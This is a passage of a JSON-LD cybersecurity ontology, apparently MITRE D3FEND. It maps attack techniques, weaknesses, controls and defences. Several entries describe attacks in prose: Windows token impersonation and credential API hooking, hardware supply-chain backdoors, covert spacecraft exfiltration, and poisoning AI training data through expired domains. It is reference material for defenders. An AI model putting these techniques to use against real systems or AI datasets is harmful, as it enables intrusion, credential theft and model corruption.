        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Publish Hallucinated Entities"
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-53A-Revision-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-53Ar5"
      },
      "d3f:kb-abstract": "This publication provides a methodology and set of procedures for conducting assessments of security and privacy controls employed within systems and organizations within an effective risk management framework. The assessment procedures, executed at various phases of the system development life cycle, are consistent with the security and privacy controls in NIST Special Publication 800-53, Revision 5. The procedures are customizable and can be easily tailored to provide organizations with the needed flexibility to conduct security and privacy control assessments that support organizational risk management processes and are aligned with the stated risk tolerance of the organization. Information on building effective security and privacy assessment plans is also provided with guidance on analyzing assessment results.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations"
    },
    {
      "@id": "d3f:InternetPersona",
      "@type": "owl:Class",
      "d3f:definition": "A social identity that an Internet user establishes in online communities and websites. It may also be an actively constructed presentation of oneself.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Online_identity"
      },
      "rdfs:label": "Internet Persona",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Online_identity"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "Online Identity",
        "Online Persona",
        "Online Personality"
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-15",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Alternate Audit Logging Capability",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "AU-15"
    },
    {
      "@id": "d3f:T1586.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586.001",
      "d3f:definition": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.",
      "rdfs:label": "Social Media Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1586"
      }
    },
    {
      "@id": "d3f:CCI-000035_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for privileged administrators to configure the organization-defined security policy filters to support different security policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000035"
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-002%3AUnusuallyLongCommandLineStrings_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-002/"
      },
      "d3f:kb-abstract": "Often, after a threat actor gains access to a system, they will attempt to run some kind of malware to further infect the victim machine. These malware often have long command line strings, which could be a possible indicator of attack. Here, we use sysmon and Splunk to first find the average command string length and search for command strings that stretch over multiple lines, thus identifying anomalies and possibly malicious commands.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-002: Unusually Long Command Line Strings",
      "rdfs:label": "Reference - CAR-2021-01-002: Unusually Long Command Line Strings - MITRE"
    },
    {
      "@id": "d3f:EmailFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EmailFiltering"
      ],
      "d3f:d3fend-id": "D3-EF",
      "d3f:definition": "Filtering incoming email traffic based on specific criteria.",
      "d3f:filters": {
        "@id": "d3f:Email"
      },
      "d3f:kb-article": "## How it works\n\nMail filters can be implemented to scan inbound email messages at the initial SMTP connection stage to detect and reject email containing spam and malware.\n\nThis technique is distinct from d3f:EmailDeletion because it prevents an email from reaching an user's inbox. This technique can also be used for outbound email traffic.\n\n## Considerations\n* The effectiveness of mail filters depend on the completeness of the filter policies",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForProvidingAnonymousRemailingAndFilteringOfElectronicMail_Nokia"
      },
      "rdfs:label": "Email Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "_:N4cb683565bfd432abfd27da7ff6828da"
        }
      ]
    },
    {
      "@id": "_:N4cb683565bfd432abfd27da7ff6828da",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:PhysicalKey",
      "@type": "owl:Class",
      "d3f:definition": "A physical key is used to operate a lock, typically metal, designed with specific markers that match the internal mechanism of a lock, allowing it to rotate the lock when inserted.",
      "rdfs:label": "Physical Key",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "_:Ndf8b96463a47478e8a8ffe7c9a41e2da"
        }
      ]
    },
    {
      "@id": "_:Ndf8b96463a47478e8a8ffe7c9a41e2da",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:operates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalKeyLock"
      }
    },
    {
      "@id": "d3f:SystemConfigurationDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database used to hold system configuration data.",
      "rdfs:label": "System Configuration Database",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:CWE-1251",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1251",
      "d3f:definition": "The product's architecture mirrors regions without ensuring that their contents always stay in sync.",
      "rdfs:label": "Mirrored Regions with Different Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1250"
      }
    },
    {
      "@id": "d3f:T1056.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1056.004",
      "d3f:definition": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:",
      "d3f:may-modify": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Credential API Hooking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N6a09d546f3424b4788039a7808370bce"
        }
      ]
    },
    {
      "@id": "_:N6a09d546f3424b4788039a7808370bce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:T1134.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.001",
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "d3f:definition": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.",
      "rdfs:label": "Token Impersonation/Theft",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:N7ef4f926714a440abb643c79abb7d8ab"
        }
      ]
    },
    {
      "@id": "_:N7ef4f926714a440abb643c79abb7d8ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:PolicyReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Policy",
      "rdfs:label": "Policy Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-8_18",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Security and Privacy Engineering Principles | Trusted Communications Channels",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:EncryptedTunnels"
      },
      "rdfs:label": "SA-8(18)"
    },
    {
      "@id": "d3f:M1026",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:StrongPasswordPolicy"
        }
      ],
      "rdfs:label": "Privileged Account Management"
    },
    {
      "@id": "d3f:CWE-593",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-593",
      "d3f:definition": "The product modifies the SSL context after connection creation has begun.",
      "rdfs:label": "Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-666"
        }
      ]
    },
    {
      "@id": "d3f:T1195.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195.003",
      "d3f:definition": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.",
      "d3f:modifies": {
        "@id": "d3f:HardwareDevice"
      },
      "rdfs:label": "Compromise Hardware Supply Chain",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1195"
        },
        {
          "@id": "_:Nfe1fa4ef6e154a7c96128e64d6e7a929"
        }
      ]
    },
    {
      "@id": "_:Nfe1fa4ef6e154a7c96128e64d6e7a929",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T0862",
      "@type": "owl:Class",
      "d3f:attack-id": "T0862",
      "d3f:definition": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment.",
      "rdfs:label": "Supply Chain Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Supply Chain Compromise"
    },
    {
      "@id": "d3f:RestoreAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreAccess"
      ],
      "d3f:d3fend-id": "D3-RA",
      "d3f:definition": "Restoring an entity's access to resources.",
      "d3f:enables": {
        "@id": "d3f:Restore"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "rdfs:label": "Restore Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nb0d2c1b4de3145c9959e8f36c160f8be"
        }
      ]
    },
    {
      "@id": "_:Nb0d2c1b4de3145c9959e8f36c160f8be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Restore"
      }
    },
    {
      "@id": "d3f:T1222.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1222.001",
      "d3f:definition": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).",
      "rdfs:label": "Windows File and Directory Permissions Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1222"
      }
    },
    {
      "@id": "d3f:AML.T0008.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.002",
      "d3f:definition": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes (see [ATT&CK](https://attack.mitre.org/techniques/T1583/001/)). Large AI datasets are often distributed as a list of URLs to individual datapoints. Adversaries may acquire expired domains that are included in these datasets and replace individual datapoints with poisoned examples ([Publish Poisoned Datasets](/techniques/AML.T0019)).",
      "rdfs:label": "Domains - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Domains"
    },
    {
      "@id": "d3f:EndpointHealthBeacon",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EndpointHealthBeacon"
      ],
      "d3f:d3fend-id": "D3-EHB",
      "d3f:definition": "Monitoring the security status of an endpoint by sending periodic messages with health status, where absence of a response may indicate that the endpoint has been compromised.",
      "d3f:kb-article": "## How it works\nEndpoints are configured to periodically generate and transmit a secure heartbeat that is delivered on a configured schedule and provides endpoint status information. Status information can include software details (version, configuration, etc), endpoint identification (MAC, IP address, machine ID) or other hardware/software configuration information. Interruption of the heartbeat can signal that the endpoint has been compromised.\n\n## Considerations\n* Security of heartbeat messages to ensure message integrity\n* Disappearance of the heartbeat could simply mean that the endpoint is powered off or intentionally disconnected from the network. Therefore other criteria may need to be used to accurately detect endpoint compromise.\n* Attacker presence on the machine may leave the heartbeat intact.\n* An attacker may determine the format of the heartbeat and continue to send it even after the machine is compromised.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-IntrusionDetectionUsingAHeartbeat_SophosLtd"
      },
      "d3f:monitors": {
        "@id": "d3f:NetworkNode"
      },
      "d3f:synonym": "Endpoint Health Telemetry",
      "rdfs:label": "Endpoint Health Beacon",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N63f6b665785249428b9b177b383bb8cb"
        }
      ]
    },
    {
      "@id": "_:N63f6b665785249428b9b177b383bb8cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:CCI-000025_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces information flow control using explicit security attributes on information, source, and destination objects as a basis for flow control decisions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000025"
    },
    {
      "@id": "d3f:EXF-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0004",
      "d3f:definition": "Some missions field secondary links, separate frequencies and hardware, for limited, purpose-built functions (e.g., rekeying, emergency commanding, beacons, custodial crosslinks). Adversaries co-opt these channels as covert data paths: embedding content in maintenance messages, beacon fields, or low-rate housekeeping; initiating vendor/service modes that carry file fragments; or switching to contingency profiles that bypass normal routing and monitoring. Because these paths are distinct from the main TT&C and may be sparsely supervised, they provide discreet avenues to move data off the spacecraft or to external relays without altering the primary link’s traffic patterns.",
      "rdfs:label": "Out-of-Band Communications Link - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Out-of-Band Communications Link"
    },
    {
      "@id": "d3f:T1162",
      "@type": "owl:Class",
      "d3f:attack-id": "T1162",
      "d3f:definition": "MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's <code>~/Library/Preferences/</code> directory in a plist file called <code>com.apple.loginitems.plist</code> (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method <code> SMLoginItemSetEnabled </code> can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well  (Citation: Adding Login Items).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.011",
      "rdfs:label": "Login Item",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.011"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1437",
      "@type": "owl:Class",
      "d3f:attack-id": "T1437",
      "d3f:definition": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server.",
      "rdfs:label": "Application Layer Protocol - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Application Layer Protocol"
    },
    {
      "@id": "d3f:T1658",
      "@type": "owl:Class",
      "d3f:attack-id": "T1658",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries may take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.",
      "rdfs:label": "Exploitation for Client Execution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExecutionTechnique"
      },
      "skos:prefLabel": "Exploitation for Client Execution"
    },
    {
      "@id": "d3f:CWE-145",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-145",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Section Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:Model-basedPolicyOptimization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MBPO",
      "d3f:definition": "Model-based policy optimization (MBPO) is a model-based, online, off-policy reinforcement learning algorithm. For more information on the different types of reinforcement learning agents",
      "d3f:kb-article": "## References\nMBPO Agents. MathWorks.  [Link](https://www.mathworks.com/help/reinforcement-learning/ug/mbpo-agents.html).",
      "rdfs:label": "Model-based Policy Optimization",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-basedReinforcementLearning"
      }
    },
    {
      "@id": "d3f:REC-0001.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.03",
      "d3f:definition": "Adversaries look for the complete crypto picture: algorithms and modes, key types and lifecycles, authentication schemes, counter or time-tag handling, anti-replay windows, link-layer protections, and any differences between uplink and downlink policy. With algorithm and key details, a threat actor can craft valid telecommands, masquerade as a trusted endpoint, or degrade availability through replay and desynchronization. Sources include interface specifications, ground software logs, test vectors, configuration files, contractor laptops, and payload-specific ICDs that reuse bus-level credentials. Particular risk arises when command links rely on authentication without confidentiality; once an adversary acquires the necessary keys or counters, they can issue legitimate-looking commands outside official channels. Programs should assume that partial disclosures, MAC length, counter reset rules, or key rotation cadence, aid exploitation.",
      "rdfs:label": "Cryptographic Algorithms - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Cryptographic Algorithms"
    },
    {
      "@id": "d3f:MACAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A media access control address (MAC address) is a unique identifier assigned to a network interface controller (NIC) for use as a network address in communications within a network segment.",
      "d3f:identifies": {
        "@id": "d3f:NetworkInterfaceCard"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:MAC_address"
      },
      "rdfs:label": "MAC Address",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:N5e9a9925a8ac4faa9b6b28a4ada027ca"
        }
      ]
    },
    {
      "@id": "_:N5e9a9925a8ac4faa9b6b28a4ada027ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkInterfaceCard"
      }
    },
    {
      "@id": "d3f:Reference-IsolationOfApplicationsWithinAVirtualMachine_Bromium,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9921860B1"
      },
      "d3f:kb-abstract": "Approaches for launching an application within a virtual machine. In response to receiving a request to launch an application, a device instantiates, without human intervention and based on a policy, a virtual machine in which the application is to be launched. The policy determines which resources of a device, such as a mobile device or computer system, are accessible to the virtual machine. The policy may, but need not, determine whether the virtual machine has access to a type of resource which obligates the user of the device to make a monetary payment for the user of the resource.",
      "d3f:kb-author": "Gaurav Banga, Sergei Vorobiev, Deepak Khajuria, Vikram Kapoor, Ian Pratt, Simon Crosby, Adrian Taylor",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bromium, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Isolation of applications within a virtual machine",
      "rdfs:label": "Reference - Isolation of applications within a virtual machine - Bromium, Inc."
    },
    {
      "@id": "d3f:AML.T0010.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.000",
      "d3f:definition": "Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs.",
      "rdfs:label": "Hardware - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Hardware"
    },
    {
      "@id": "d3f:CWE-498",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-498",
      "d3f:definition": "The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class.",
      "rdfs:label": "Cloneable Class Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:ApplicationEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the enabling of an application, allowing it to be started or accessed when required.",
      "rdfs:label": "Application Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N35d44398d07a4d008422c65acbde1d5e"
        }
      ]
    },
    {
      "@id": "_:N35d44398d07a4d008422c65acbde1d5e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:T1426",
      "@type": "owl:Class",
      "d3f:attack-id": "T1426",
      "d3f:definition": "Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infects the target and/or attempts specific actions.",
      "rdfs:label": "System Information Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "System Information Discovery"
    },
    {
      "@id": "d3f:REC-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001",
      "d3f:definition": "Threat actors seek a coherent picture of the spacecraft and its supporting ecosystem to reduce uncertainty and plan follow-on actions. Useful design information spans avionics architecture, command and data handling, comms and RF chains, power and thermal control, flight dynamics constraints, payload-to-bus interfaces, redundancy schemes, and ground segment dependencies. Artifacts often include ICDs, block diagrams, SBOMs and toolchains, test procedures, AIT travelers, change logs, and “as-built” versus “as-flown” deltas. Adversaries combine open sources (papers, patents, theses, conference slides, procurement documents, FCC/ITU filings, marketing sheets) with gray sources (leaked RFP appendices, vendor manuals, employee resumes, social posts) to infer single points of failure, unsafe modes, or poorly defended pathways between space, ground, and supply chain. The output of this activity is not merely a document set but a working mental model and, often, a lab replica that enables rehearsal, timing studies, and failure-mode exploration.",
      "rdfs:label": "Gather Spacecraft Design Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Spacecraft Design Information"
    },
    {
      "@id": "d3f:FlightSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ]
    },
    {
      "@id": "d3f:CWE-328",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-328",
      "d3f:definition": "The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).",
      "rdfs:label": "Use of Weak Hash",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-326"
        },
        {
          "@id": "d3f:CWE-327"
        }
      ]
    },
    {
      "@id": "d3f:name",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "name"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:InterquartileRange",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IR",
      "d3f:definition": "The interquartile range (IQR) is a measure of statistical dispersion, which is the spread of the data and is defined as the difference between the 75th and 25th percentiles of the data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Interquartile range. [Link](https://en.wikipedia.org/wiki/Interquartile_range)",
      "d3f:synonym": "IQR",
      "rdfs:label": "Interquartile Range",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:CodecApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:CodecLibrary"
      },
      "d3f:definition": "An application that encodes and decodes digital data.",
      "rdfs:label": "Codec Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserApplication"
        },
        {
          "@id": "_:Nce0f662a36c04f98a4d538f3f1823767"
        }
      ]
    },
    {
      "@id": "_:Nce0f662a36c04f98a4d538f3f1823767",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CodecLibrary"
      }
    },
    {
      "@id": "d3f:T1027.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.004",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)",
      "rdfs:label": "Compile After Delivery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:N7549241edea2497e80ecf786bb0749b6"
        }
      ]
    },
    {
      "@id": "_:N7549241edea2497e80ecf786bb0749b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:CWE-1221",
